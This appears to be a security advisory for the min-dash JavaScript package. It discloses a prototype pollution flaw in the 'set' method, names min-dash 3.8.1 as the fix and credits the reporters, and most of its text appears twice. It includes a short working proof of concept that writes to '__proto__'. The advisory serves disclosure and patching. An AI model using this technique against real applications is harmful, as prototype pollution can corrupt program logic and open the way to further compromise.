Impact
The set
method is vulnerable to prototype pollution with specially crafted inputs.
// insert the following into poc.js and run node poc,js (after installing the package)
let parser = require("min-dash");
parser.set({}, [["__proto__"], "polluted"], "success");
console.log(polluted);
Patches
min-dash>=3.8.1
fix the issue.
Workarounds
No workarounds exist for the issue.
References
Closed via #21.
Credits
Credits to Cristian-Alexandru STAICU who found the vulnerability and to Idan Digmi from the Snyk Security Team who reported the vulnerability to us, responsibly.
Impact
The
set
method is vulnerable to prototype pollution with specially crafted inputs.Patches
min-dash>=3.8.1
fix the issue.Workarounds
No workarounds exist for the issue.
References
Closed via #21.
Credits
Credits to Cristian-Alexandru STAICU who found the vulnerability and to Idan Digmi from the Snyk Security Team who reported the vulnerability to us, responsibly.